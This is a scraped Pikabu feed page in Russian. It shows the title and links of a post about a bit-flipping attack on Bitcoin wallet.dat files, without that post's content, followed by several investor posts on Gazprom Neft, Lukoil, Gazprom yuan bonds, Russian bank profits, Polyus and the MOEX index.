Video tutorial: https://dzen.ru/video/watch/68baca013761775f268041dc

Источник: https://cryptodeeptool.ru/bit-flipping-attack-on-wallet-dat


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Показать полностью 22 1
Криптовалюта Финансовая грамотность Биткоины YouTube Трейдинг Арбитраж криптовалюты Заработок в интернете Заработок Вклад Облигации Пассивный доход Дивиденды Ключевая ставка Валюта Инвестиции в акции Видео Telegram (ссылка) Яндекс Дзен (ссылка) YouTube (ссылка) Длиннопост
1
4
krasikov944krasi
krasikov944krasi
9 часов назад
Лига биржевой торговли

Жильё стало роскошью⁠⁠

В 1985 году новый дом в США стоил около 3,6 годовых доходов семьи. Сегодня — уже 5,3. Доходы почти не выросли, а цены на жильё и налоги на недвижимость улетели вверх. Именно с этих налогов финансируются школы, и на них выпускаются специальные «школьные облигации».

Жильё стало роскошью Доллары, Инфляция, Валюта, Облигации, Дивиденды, Аналитика

Митч Векслер, девелопер (август 2025):

«Объём несостоятельных школьных долгов перевалил за $5 трлн. Большая часть новых выпусков идёт не на строительство, а на погашение старых долгов».

Фактически семьи платят всё больше налогов с завышенных оценок домов, которых не поддерживают реальные доходы. Если начнутся массовые неплатежи, бюджеты школьных округов не выдержат, и рухнет вся система муниципальных облигаций.

Вывод: речь идёт уже не о доступности жилья, а о стабильности финансовой архитектуры США.

НАШ ТГ КАНАЛ: https://t.me/+KvGj2ztTTNMxNTMy

Показать полностью 1
[моё] Доллары Инфляция Валюта Облигации Дивиденды Аналитика
8
2
svoiinvestor
svoiinvestor
20 часов назад
Лига Инвесторов

Газпромнефть отчиталась за II кв. 2025 г. — цена на нефть, укрепление рубля и SDN санкции продолжают ухудшать фин. положение. Дивиденды?⁠⁠

Газпромнефть отчиталась за II кв. 2025 г. — цена на нефть, укрепление рубля и SDN санкции продолжают ухудшать фин. положение. Дивиденды? Политика, Фондовый рынок, Биржа, Инвестиции, Аналитика, Экономика, Инвестиции в акции, Газпром, Нефть, Газ, Валюта, Доллары, Санкции, Отчет, Облигации, Дивиденды, Ключевая ставка, Рубль, Долг, Налоги, Длиннопост

🛢 ГПН представила нам финансовые результаты за I полугодие и II квартал 2025 г. Сокращённый отчёт получился ожидаемо слабым, фин. положение эмитента продолжает ухудшаться, из-за этого аппетиты Газпрома (главный мажоритарий) по выплате дивидендов были сокращены, в прошлой разборке я предупреждал, что payout может сократится до 50%, но без сюрпризов по выкачке денег с "дочки" не обошлось:

🛢️ Выручка: I п. 1,8₽ трлн (-12,1% г/г), II кв. 884₽ млрд (-15,1% г/г)
🛢️ EBITDA: I п. 510,1₽ млрд (-27,6% г/г), II кв. 238,1₽ млрд (-32,1% г/г)
🛢️ Чистая прибыль: I п. 150,5₽ млрд (-54,2% г/г), II кв. 57,8₽ млрд (-65,8% г/г)

💬 Компания предоставила сокращённые операционные данные — добыча углеводородов увеличилась во II кв. на 4,5%, а объём переработки на 6%. РФ в 2024 г. 6 месяцев не придерживалась плана сокращения, поэтому в 2025 г., начиная с I кв. происходила компенсация по добыче за ранее превышенные квоты, но со II кв. РФ уже начала наращивать добычу. По нефтепродуктам — демпферные выплаты за II кв. 2025 г. составили 143 млрд (-73,9% г/г), катастрофическое падение. Средний курс $ во II кв. 2025 г. — 80,8₽, в 2024 г. — 90,4₽, средняя цена Urals во II кв. 2025 г. — 55,5$, в 2024 г. — 70,6$.

💬 Думаю к падению выручки не должны возникнуть вопросы. Опер. расходы снизились до 792,1₽ млрд (-6,6% г/г, темпы сокращения меньше, чем в выручке). На это повлияли статьи: производственные расходы — 133,2₽ млрд (+5,7% г/г), амортизация — 112,1₽ млрд (+12,1% г/г) и транспортные расходы — 72,7₽ млрд (-5,5% г/г). Как итог опер. прибыль снизилась до 92₽ млрд (-52,4% г/г).

Газпромнефть отчиталась за II кв. 2025 г. — цена на нефть, укрепление рубля и SDN санкции продолжают ухудшать фин. положение. Дивиденды? Политика, Фондовый рынок, Биржа, Инвестиции, Аналитика, Экономика, Инвестиции в акции, Газпром, Нефть, Газ, Валюта, Доллары, Санкции, Отчет, Облигации, Дивиденды, Ключевая ставка, Рубль, Долг, Налоги, Длиннопост

💬 Падение чистой прибыли ускорил убыток в совместных предприятиях (Арктикгаз, Славнефть и др.) -779₽ млн (годом ранее прибыль в 13,9₽ млрд), разница финансовых доходов/расходов -18₽ млрд (огромный долг и высокая ключевая ставка, годом ранее -4,8₽ млрд) и ускорившийся убыток в ~3 раза в прочих расходах -5,9₽ млрд (годом ранее -2,2₽ млрд). Курсовые разницы принесли +12,8₽ млрд (₽ значительно укрепился, некоторые долги компании номинированы в валюте, год назад +16₽ млрд).

💬 Кэш на счетах увеличился до 226,4₽ млрд (в I кв. 2025 г. — 132,8₽ млрд). Долг увеличился до 1,035₽ трлн (в I кв. 2025 г. — 936,1₽ млрд). Показатель чистый долг/EBITDA составил — 0,78x, выплата дивидендов в долг до добра не доводит.

💬 OCF снизился до 154,3₽ млрд (-39% г/г), падение сократил приток денег в оборотный капитал (+47,1₽ млрд vs. +22,4₽ млрд годом ранее, видимо, рассчитались по дебиторке и распродали запасы), CAPEX значительно сократили во II кв. — 43,8₽ млрд (-68,5% г/г), но не торопитесь аплодировать менеджменту ГПН за это действие, потому что 105,4₽ млрд были направлены на погашение строительства (видимо деньги пошли на проект Лахта-2). FCF во II кв. положительный 110,5₽ млрд (-3,2% г/г), FCF за I полугодие составил 37₽ млрд (-77% г/г), то есть свободных денег хватает на выплату 7,8₽ на акцию в виде дивиденда за I п. Но мы уже знаем, что СД ГПН рекомендует выплатить за I п. 2025 г. 17,3₽ на акцию, согласно див. политике основу для выплаты составляет чистая прибыль, но если раньше платили 75% от ЧП, то сейчас направили чуть более 50% (опять же дивиденды заплатят в долг).

Газпромнефть отчиталась за II кв. 2025 г. — цена на нефть, укрепление рубля и SDN санкции продолжают ухудшать фин. положение. Дивиденды? Политика, Фондовый рынок, Биржа, Инвестиции, Аналитика, Экономика, Инвестиции в акции, Газпром, Нефть, Газ, Валюта, Доллары, Санкции, Отчет, Облигации, Дивиденды, Ключевая ставка, Рубль, Долг, Налоги, Длиннопост

📌 В августе восьмёрка стран ОПЕК+ увеличили квоты на добычу в сентябре, Россия в сентябре сможет добывать 9,45 млн б/с. Цена Urals держится у 60$ за баррель, а ₽ не сильно ослаб (сейчас где-то 80₽ за $). Долг компании перевалил за 1₽ трлн, а % расходы во II кв. увеличились в двое — 30,8₽ млрд. Сокращение payouta до 50% это великолепно, но дивиденды всё равно будут выплачены в долг (логичнее всего перейти на выплату от FCF), так же как и снижение инвестиций отлично, но 100₽ млрд были "изъяты" на игрушку Газпрома. Ситуация такая, что ГПН начинает превращаться по фин. положению в Газпром — печально.

С уважением, Владислав Кофанов

Телеграмм-канал: t.me/svoiinvestor

Показать полностью 3
[моё] Политика Фондовый рынок Биржа Инвестиции Аналитика Экономика Инвестиции в акции Газпром Нефть Газ Валюта Доллары Санкции Отчет Облигации Дивиденды Ключевая ставка Рубль Долг Налоги Длиннопост
3
3
chastnyjinvestor
chastnyjinvestor
1 день назад
Лига Инвесторов

Рынок акций преодолевает критический рубеж! Падение продолжится?⁠⁠

На этой неделе падение рынка акций продолжилось. И теперь индексу ММВБ удалось упасть к глобальному восходящему тренду, к которому ранее цена никак не могла вплотную подойти. Но на этой неделе его сразу же удалось пробить и упасть к 2840 пунктам! Технически это перестраивает картину рынка в сторону усиления падения, возможность чего описывал в прошлом обзоре, поэтому давайте обсудим ближайшие перспективы рынка акций.

Рынок акций преодолевает критический рубеж! Падение продолжится? Фондовый рынок, Биржа, Инвестиции в акции, Финансы, Трейдинг, Облигации, Дивиденды, Ключевая ставка, Валюта, Рубль, Доллары, Акции, Инвестиции, Кризис, Россия, Инфляция, Длиннопост

График (H1) индекса ММВБ

С того момента как прошла встреча президентов РФ и США, которая, как тогда предполагал, ни к чему значимому не привела, рынок акций в основном снижается, ведь те позитивные ожидания, которые закладывались в цены месяц назад, как обычно, не оправдались. Однако сильного обвала рынка не случилось. Всё же акции регулярно отскакивают и до этой недели индекс оставался выше глобального аптренда, что удерживало его от сильного падения.

Но теперь цене удалось пробить этот аптренд. С точки зрения технического анализа это довольно важный момент, и такая динамика цены вполне может привести к ускорению падения рынка, если ей удастся закрепиться под линией тренда. И этот вопрос как решается сегодня, как видно из графика.

Всю прошлую неделю индекс провел, по сути, в боковике между двумя трендовыми линиями (старой нисходящей и глобальной восходящей), но вот четко достичь что одну, что другую линию ему никак не удавалось. А ведь как раз на это у меня и был расчет, когда удерживал ранее шорт и лонг по фьючерсу на индекс.

Шорт я набрал в середине августа еще от 3000 пунктов и изначально планировал полностью зафиксировать по нему прибыль возле линии глобального аптренда, около 2850 пунктов. Но индекс дошел до 2857 и резко отскочил, пробив локальный нисходящий тренд. Как тогда предупреждал в своем обзоре, в этом случае позицию полностью зафиксировал и перешел к лонгу от 2885 с целью 2950, а именно, к линии старого нисходящего тренда. Затем из-за боковика цель пришлось понизить к 2930-2940, но к ней индекс вплотную не подошел. Поэтому на пробое локального аптренда пришлось закрыть лонг с небольшим плюсом по 2910.

Кстати, ранее в телеграм-канале публиковал пост с результатами своих прогнозов по нескольким популярным акциям. Результаты отличные, все прогнозы исполнились!

Далее, как писал в прошлом обзоре, стало ясно, что теперь все будет решать уровень 2900. Если цена закрепится под ним, то рынок продолжит падение и уже пробьет линию аптренда, что приведет к ускорению снижения. Поэтому снова стал переходить к шорту фьючерса на индекс. Правда шорт от 2900 с прошлой пятницы все же пришлось закрыть по стопу на выходных, так как индекс снова поднялся выше 2900, но в понедельник я снова вернулся к шорту на пробое 2900 вниз. Перед пробоем аптренда индекс все же попытался подняться к линии нисходящего тренда и практически достиг ее около 2930.

В итоге, как видите, цена пробила вниз аптренд, после чего отскочила обратно к нему для тестирования снизу и теперь пытается закрепиться под ним. И если ей это удастся, то, весьма вероятно, рынок продолжит падение в сторону уровня 2800, на что теперь и рассчитываю, удерживая шорт по фьючерсу от 2900, часть позиции по которому вчера зафиксировал по 2850 в расчете на этот ретест трендовой, а сегодня этот объем снова вернул.

Если же рынок решит продолжить боковик и сможет вернуться выше трендовой, а значит, снова закрепиться выше уровня 2900, то шорт закрою по стопу, поскольку тогда возрастет вероятность продолжения роста к 2920-2930, которое пока еще исключать нельзя. Однако если тест трендовой будет успешным, то, скорее всего, индекс продолжит падение в сторону уровня 2800.

И вот тут важно понимать, что на этот раз при выстроенной технической картине это довольно сильный уровень и пробить сразу его вряд ли получится. Не исключено, что от него индекс может еще прилично отскочить, поэтому пока планирую фиксировать там шорт, если, конечно, рынок развернется вниз.

И только после пробоя 2800 и закрепления индекса под этим уровнем можно будет рассчитывать на обвал акций. Технически пробой 2800 сломает ту структуру перехода к растущему рынку, которая выстраивалась на графике с начала августа. Пока этого не произошло, рынок может снова перейти к росту либо в случае пробоя 2900 и закрепления цены выше трендовой, либо после падения к 2800 и отскока от этого уровня.

Если смотреть фундаментально, то большинство ожидаемых к началу осени позитивных событий уже произошло и какого-то фактического позитива рынок не увидел, хотя закладывал такие ожидания в цены акций. Вдобавок негативных новостей становится всё больше в последние недели. И отчеты компаний за первое полугодие 2025 года не радуют, хотя многие из них, скажем так, ожидаемо плохие (с результатами некоторых крупных компаний можно ознакомиться на моем канале).

И похоже, что ключевое влияние на рынок акций окажет последнее важное ожидаемое событие ближайшей недели, а именно, заседание ЦБ по ставке. Полагаю, именно оно определит направление рынка акций на ближайший месяц, поэтому стоит внимательно следить за рынком на следующей неделе в пятницу. Мы еще обсудим в будущем обзоре возможное решение ЦБ, и какое влияние оно окажет на рынок акций.

Кстати, для тех, кто хочет всегда быть в курсе ключевых рыночных трендов, у меня есть телеграм-канал, где я оперативно делюсь самыми важными прогнозами и новостями. Присоединяйтесь сейчас, чтобы не упустить ключевые финансовые возможности уже в ближайшем будущем!

В общем, индекс пытается сломать растущую тенденцию и перейти к более глубокому падению. Посмотрим, получится ли это сделать. Пока небольшой шанс на продолжение роста еще есть. Нужно наблюдать опять же за уровнем 2900. Если индекс не сможет его снова преодолеть и закрепиться над ним, то, скорее всего, падение рынка продолжится.

Спасибо, что дочитали. Всем удачи и профита!

Показать полностью 1
[моё] Фондовый рынок Биржа Инвестиции в акции Финансы Трейдинг Облигации Дивиденды Ключевая ставка Валюта Рубль Доллары Акции Инвестиции Кризис Россия Инфляция Длиннопост
0
0
Bondovichok
Bondovichok
1 день назад
Лига Инвесторов

Газпром снова в юанях: купон 6,8% — надёжность запредельная, доходность скромная⁠⁠

Газпром снова в юанях: купон 6,8% — надёжность запредельная, доходность скромная Облигации, Финансовая грамотность, Инвестиции, Финансы, Ключевая ставка, Юань, Газпром, Дивиденды, Валюта, Аналитика, Вклад, Рубль

Ну что, друзья, Газпром снова машет веером валютных выпусков и выходит с новой порцией юаневых облигаций. Это уже второй китайский займ за лето: до этого были доллары, евро — весь валютный букет собран. Теперь очередь снова за CNY.

📌 Параметры выпуска БО-003Р-19

  • Номинал: 1000 ¥

  • Объём: от 1,5 млрд ¥

  • Срок: 2 года

  • Купон: до 6,8% (YTM до 7,02%)

  • Выплаты: ежемесячные

  • Оферта и амортизация: нет

  • Рейтинг: топовые AAA от АКРА и Эксперт РА

  • Сбор заявок: 4 сентября

  • Размещение: 9 сентября

💰 Финансы Газпрома (1П2025)

  • Выручка: 4,99 трлн ₽ (–2% г/г).

  • EBITDA: 1,55 трлн ₽ (+6%).

  • Чистая прибыль: 983 млрд ₽ (–6%).

  • Чистый долг: 5,54 трлн ₽ (–3% за полгода).

  • ЧД/EBITDA = 1,7х (снижение с 1,83х).

По сути, компания удерживает прибыльность даже на падающих ценах на нефть и при крепком рубле. Долговая нагрузка остаётся гигантской в абсолюте, но для «слона» в 30 трлн ₽ активов это уровень комфортный.

⚖️ Что хорошего

  • Надёжность максимальная. По сути, вы кредитуете государство через Газпром Капитал.

  • Регулярный доход. Ежемесячные купоны в валюте — редкость, и здесь они есть.

  • Снижение долговой нагрузки. ЧД/EBITDA вернулся к вменяемым 1,7х.

⚠️ Что напрягает

  • Доходность. 6,8% в юанях — это скорее альтернатива депозиту, чем инструмент для заработка. На фоне ВДО с купонами 20–25% выглядит «диетично».

  • Курс юаня. Все выплаты будут в рублях по курсу ЦБ. Если рубль укрепится, доходность в реальном выражении скукожится.

  • Нет ЛДВ. Срок всего 2 года, так что «поиграть в длинную» не получится.

🎯 Вывод
Газпром снова даёт рынку «спокойный уголок» в китайской валюте. Для тех, кто хочет диверсифицировать валютную корзину и получить доход чуть выше банковских вкладов — инструмент норм. Но если ищете двузначные цифры и драйв — проходите мимо, тут не про апсайд, а про надёжность.

А больше информации об облигациях можно найти в моем тг-канале "Бондовичок" - ссылка в шапке профиля!

Показать полностью
[моё] Облигации Финансовая грамотность Инвестиции Финансы Ключевая ставка Юань Газпром Дивиденды Валюта Аналитика Вклад Рубль
1
10
svoiinvestor
svoiinvestor
2 дня назад
Лига Инвесторов

ЛУКОЙЛ отчитался за I п. 2025 г. — выкупили акций на 654 млрд руб., и погасят большую часть, это при снижении фин. доходов. Дивиденды?⁠⁠

ЛУКОЙЛ отчитался за I п. 2025 г. — выкупили акций на 654 млрд руб., и погасят большую часть, это при снижении фин. доходов. Дивиденды? Фондовый рынок, Биржа, Инвестиции, Аналитика, Экономика, Инвестиции в акции, Валюта, Дивиденды, Нефть, Лукойл, Доллары, Ключевая ставка, Рубль, Отчет, Санкции, Инфляция, Облигации, Иностранцы, Политика, Газ, Длиннопост

⛽️ ЛУКОЙЛ опубликовал финансовые результаты по МСФО за I полугодие 2025 г. Ожидаемо I п. для эмитента получилось слабым, конечно, это повлияло на фин. результаты компании, но менеджмент сделал пару прекрасных действий за это полугодие:

🛢️ Выручка: 3,6₽ трлн (-16,9% г/г)
🛢️ EBITDA: 606,2₽ млрд (-38,4% г/г)
🛢️ Чистая прибыль: 288,6₽ млрд (-51,2% г/г)

⬇️ Компания не предоставила операционных данных, но мы знаем, что РФ в 2024 г. 6 месяцев не придерживалась плана сокращения, поэтому в 2025 г., начиная с I кв. происходила компенсация по добыче за ранее превышенные квоты, но со II кв. РФ уже начала наращивать добычу. По данным ОПЕК в июне РФ добыла нефти — 9,025 млн б/с (+41 тыс. б/с м/м). Проблема была сформирована в укреплении ₽ (средний курс $ за I п. 2025 г. — 86,9₽ vs. средний курс $ за I п. 2024 г. — 90,5₽) и снижении цены на Urals (средняя цена Urals в I п. 2025 г. — 59,2$, в I п. 2024 г. — 69,1$). Что же насчёт нефтепродуктов, то я разбирал полугодовой отчёт по НГД, демпферные выплаты за I п. 2025 г. составили 547 млрд (-44,5% г/г), катастрофическое падение по сравнению с 2024 г.

ЛУКОЙЛ отчитался за I п. 2025 г. — выкупили акций на 654 млрд руб., и погасят большую часть, это при снижении фин. доходов. Дивиденды? Фондовый рынок, Биржа, Инвестиции, Аналитика, Экономика, Инвестиции в акции, Валюта, Дивиденды, Нефть, Лукойл, Доллары, Ключевая ставка, Рубль, Отчет, Санкции, Инфляция, Облигации, Иностранцы, Политика, Газ, Длиннопост

⬇️ Теперь вы должны понять, почему просела выручка. Проблема остаётся в затратах и прочих расходах — 3,3₽ млрд (-10,5% г/г, темпы сокращения меньше, чем в выручке), стоит выделить несколько статей: админ. расходы — 277,9₽ млрд (+79,3% г/г) и НДПИ/НДД/ЭП — 898,2₽ трлн (-7,7% г/г). Как итог, опер. прибыль ополовинилась — 344,7₽ млрд (-50,3% г/г).

⬇️ Снижение прибыли связано с разницей в финансовых доходах/расходах — 38,8₽ млрд (-5% г/г, денежная позиция значительно сократилась). Неожиданно курсовые разницы принесли прибыль — 2,2₽ млрд (годом ранее убыток в -45,5₽ млрд), повлияли валютные долги, а как мы знаем ₽ укрепился, но главное это сокращение денежной позиции (большая часть кубышки была в валюте, её сократили).

⬇️ Кэш на счетах составляет 488,2₽ млрд (на конец 2024 г. — 1,42₽ трлн), сокращение связано с выплатой дивидендов и выкупом увесистого пакета акций на 654₽ млрд (90,7 млн акций по 7209₽ за акцию). Такой пакет акций сложно купить с рынка (при том, что видимых объёмов не было), поэтому покупка осуществлялась вне рынка (скорее всего Федун получил солидную пенсию). Главное, что компания погасит квазиказначейские акции не превышающие 76 млн (30 млн оставлены под мотивацию сотрудникам), а при расчёте FCF не будут учитывать расходы на приобретение данного пакета (плюс при расчёте дивидендов можно будет уже вычитать эти 76 млн акций). Долг снизился до 344,7₽ млрд (на конец 2024 г. — 380₽ млрд).

ЛУКОЙЛ отчитался за I п. 2025 г. — выкупили акций на 654 млрд руб., и погасят большую часть, это при снижении фин. доходов. Дивиденды? Фондовый рынок, Биржа, Инвестиции, Аналитика, Экономика, Инвестиции в акции, Валюта, Дивиденды, Нефть, Лукойл, Доллары, Ключевая ставка, Рубль, Отчет, Санкции, Инфляция, Облигации, Иностранцы, Политика, Газ, Длиннопост

⬇️ OCF снизился до 711,6₽ млрд (-9% г/г, сократить разрыв помог оборотный капитал: рассчитались по дебиторке и распродали запасы), с учётом CAPEXa — 386,6₽ млрд (+18,3% г/г), то скорректированный FCF составил 286₽ млрд (-28,2% г/г). Согласно див. политике компании на дивиденды направляют 100% FCF, это значит, что FCF хватает на выплату 463₽ на акцию.

⬇️ Компания должна нерезидентам 300₽ млрд дивидендов (средства зависли из-за санкций), пока они формируют часть денежной позиции (лишившись этой суммы, чистый долг будет уже положительным) и приносят нехилые %, но по идее спустя 3 года они будут не востребованы и вернуться в компанию.

ЛУКОЙЛ отчитался за I п. 2025 г. — выкупили акций на 654 млрд руб., и погасят большую часть, это при снижении фин. доходов. Дивиденды? Фондовый рынок, Биржа, Инвестиции, Аналитика, Экономика, Инвестиции в акции, Валюта, Дивиденды, Нефть, Лукойл, Доллары, Ключевая ставка, Рубль, Отчет, Санкции, Инфляция, Облигации, Иностранцы, Политика, Газ, Длиннопост

📌 В августе восьмёрка стран ОПЕК+ увеличили квоты на добычу в сентябре, Россия в сентябре сможет добывать 9,45 млн б/с. Цена Urals держится у 60$ за баррель, а ₽ не сильно ослаб (сейчас где-то 80₽ за $). Проблема кроется в сокращении кубышки, она прохудилось на 2/3, а % доходы во II п. значительно просядут, да можно оперировать, что опер. результаты III кв. будут лучше, чем во II кв., но этого мало. Положительная сторона это гашение квазиказначейских акций, из-за этого потенциал акции вырос на 10%, так же увеличивается дивидендная выплата (дивидендный аристократ), не забываем про инвестиционные доли в компаниях (Яндекс и ЭЛ5-Энерго).

С уважением, Владислав Кофанов

Телеграмм-канал: t.me/svoiinvestor

Показать полностью 4
[моё] Фондовый рынок Биржа Инвестиции Аналитика Экономика Инвестиции в акции Валюта Дивиденды Нефть Лукойл Доллары Ключевая ставка Рубль Отчет Санкции Инфляция Облигации Иностранцы Политика Газ Длиннопост
1
6
svoiinvestor
svoiinvestor
3 дня назад
Лига Инвесторов

Чистая прибыль банковского сектора в июле 2025 г. — продолжает увеличиваться благодаря налоговым манёврам, но балансовый капитал просел⁠⁠

Чистая прибыль банковского сектора в июле 2025 г. — продолжает увеличиваться благодаря налоговым манёврам, но балансовый капитал просел Политика, Фондовый рынок, Биржа, Инвестиции, Аналитика, Отчет, Инвестиции в акции, Облигации, Ключевая ставка, Валюта, Экономика, Сбербанк, Банк ВТБ, Кредит, Дивиденды, Вклад, Рубль, Доллары, Ипотека, Банк, Длиннопост

💳 По данным ЦБ, в июле 2025 г. прибыль банков составила 397₽ млрд (+29,7% г/г, в июне — 392₽ млрд), по сравнению с прошлым годом есть ощутимое увеличение — 306₽ млрд в июле 2024 г. Также отмечаю, что доходность на капитал в июле увеличилась с 24,5 до 24,9%. Теперь приступим к интересным фактам из отчёта:

🟣 Основная прибыль (состоит из ЧПД, ЧКД, операционных расходов и чистого доформирования резервов) сократилась до 285₽ млрд (в июне 323₽ млрд), несмотря на увеличение ЧПД (+54₽ млрд, +9% м/м). Снижение связано с ростом отчислений в резервы по прочим активам (+101₽ млрд) относительно июня (тогда у банков были разовые восстановления по прочим требованиям). Резервы по кредитам при этом почти не изменились (+5₽ млрд, +4% м/м).

🟣Неосновные (волатильные) доходы — преимущественно от операций с валютой и дивиденды дочерних компаний, почти не изменились и составили 155₽ млрд (-7₽ млрд по сравнению с июнем).

🟣При этом у банков сократились налоговые отчисления (-47₽ млрд по сравнению с июнем) из-за разницы в отражении доходов между бухгалтерским и налоговым учётом. Она возникла в результате положительной переоценки отдельных активов в бухгалтерском учёте (в налоговой базе эта переоценка не учитывается).

🟣 За 7 месяцев банки заработали 2,1₽ трлн чистой прибыли, что соответствует прошлогодним заработкам. Банкам удаётся поддерживать широкую маржу в условиях жёстких ДКУ, несмотря на заметный рост отчислений в резервы из-за постепенного вызревания розничного портфеля.

Чистая прибыль банковского сектора в июле 2025 г. — продолжает увеличиваться благодаря налоговым манёврам, но балансовый капитал просел Политика, Фондовый рынок, Биржа, Инвестиции, Аналитика, Отчет, Инвестиции в акции, Облигации, Ключевая ставка, Валюта, Экономика, Сбербанк, Банк ВТБ, Кредит, Дивиденды, Вклад, Рубль, Доллары, Ипотека, Банк, Длиннопост

🟣 Балансовый капитал снизился на 0,7₽ трлн (-3,7% м/м) обусловлено начислением дивидендов некоторыми крупными банками на общую сумму 1,1₽ трлн (в августе в ФБ должны прийти дивиденды от ВТБ — 223,2₽ млрд и Сбербанка — 393,2₽ млрд). При этом капитал поддержала чистая прибыль, а также значительная положительная переоценка ценных бумаг (ОФЗ), отражаемая напрямую в капитале (+118₽ млрд).

Данные изменения видны по отчёту:

🏦 Отчёт Сбербанка за июль: расходы на резервы и переоценка кредитов за июль составила -79,4₽ млрд (годом ранее -38,1₽ млрд), в РПБУ учитывается валютная переоценка в резервах, поэтому резервирование приходится высчитывать (по моим подсчётам переоценка принесла убыток в -15,15₽ млрд, а резервирование составило -64,25₽ млрд). Достаточность капитала составляет 12,8% (-1,3% м/м, выше на 0,9%, чем год назад), произошла выплата дивидендов 789₽ млрд, прибыль и переоценка ОФЗ сгладили эту выплату (+65₽ млрд из-за роста RGBI). Вклад же Сбера в общую банковскую прибыль в июле составил 36,5%.

🏦 Отчёт ВТБ за июль: отчисления в резервы составили 9,2₽ млрд (-39,5% г/г), высокая база прошлого года ушла в небытие. Стоимость риска в июле составила 1,1% (0,9% в прошлом году, покрытие неработающих кредитов резервами за месяц увеличилось на 0,7 п.п. до 128,6%).Общая достаточность капитала за месяц снизилась до 9,7% (min допустимое значение с учётом надбавок — 9,25%), снижение связано с выплатой дивидендов (стоит признать, что часть капитала была компенсирована прибылью и ОФЗ, т.к. индекс RGBI значительно вырос в июле). В августе достаточность капитала просядет ещё, банк разбил дивиденд на 2 транша (1 — 50₽ млрд в июле, 2 — 220₽ млрд в августе). К этому манёвру банк привлёк 2 суборд из ФНБ на 200₽ млрд и сделает допэмиссию на 90₽ млрд. Вклад же ВТБ в общую банковскую прибыль в июле составил 5,9%.

📌 Регулятор добился охлаждения в потреб. кредитовании (давит на заработки), но всё же я замечаю оживление в ипотечном кредитовании и корпоративном. В июле на помощь пришло сокращение налоговых отчислений и рост активов, укрепление же ₽ не даёт заработать на курсовых разницах. Балансовый капитал в июле значительно сократился, посмотрим, как это повлияет на заработки банков в августе.

С уважением, Владислав Кофанов

Телеграмм-канал: t.me/svoiinvestor

Показать полностью 1
[моё] Политика Фондовый рынок Биржа Инвестиции Аналитика Отчет Инвестиции в акции Облигации Ключевая ставка Валюта Экономика Сбербанк Банк ВТБ Кредит Дивиденды Вклад Рубль Доллары Ипотека Банк Длиннопост
0
3
InvestEra
InvestEra
4 дня назад

Полюс – рост только благодаря ценам на золото⁠⁠

Полюс – рост только благодаря ценам на золото Биржа, Ключевая ставка, Фондовый рынок, Акции, Финансовая грамотность, Дивиденды, Трейдинг, Валюта

Компания представила сильные результаты МСФО за H1 25:

🔹 Выручка 3,7 b$ (+35% г/г)

🔹 EBITDA 2,7 b$ (+32% г/г)

🔹 Скорр. чистая прибыль 1,4 b$ (+20% г/г)

🔹 Реализация золота 1,2 млн oz. (-5% г/г)

🔹 TCC 653 $/oz. (+54% г/г)

🔹 AISC 1255 $/oz. (+65% г/г)

Рост выручки с прибылью обусловлен только подорожанием золота. Производство не наращивали, потому что на основном месторожении (Олимпиаде) руда становится беднее, идет переход к следующим очередям и этапам месторождений. Из-за этого и реализация золота упала на 5% г/г.

Почему сильно выросли затраты на добычу (TCC, AISC)?

🟥 Кроме активизации вскрышных работ, вкладываются в строительство ЗИФ-5. Капитальные расходы удвоились г/г

🟥 Повысился НДПИ. В 2025 году к стандартной ставке НДПИ введена надбавка в размере 10% от превышения мировой цены над уровнем 1900 $/oz.

Котировки на отчете упали на 2%. Мы предупреждали, что компания вступает в период сниженной добычи и роста расходов. Динамика золота остается единственной поддержкой финансовым показателям. Снижение производства золота, рост TCC может наблюдаться и в 2026-2027. Не забываем, что вовсю идет строительство Сухого Лога.

Рекомендовали дивиденды в 30% EBITDA (70,85 руб.). Если золото останется на текущих уровнях до конца года, можно рассчитывать на 5-6% дивидендную доходность.

Долгосрочно Полюс – единственный привлекательный вариант в золотодобытчиках. У ЮГК непонятно, как Газпромбанк распорядится своей долей. У Селигдара все еще акционерные проблемы. Коррекцией можно воспользоваться и докупить PLZL в расчете на запуск новых месторождений и роста производства после 2026. Спекулятивно брать куда менее интересно, т.к. тут основной расчет на ослабление рубля.

Показать полностью 1
[моё] Биржа Ключевая ставка Фондовый рынок Акции Финансовая грамотность Дивиденды Трейдинг Валюта
0
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии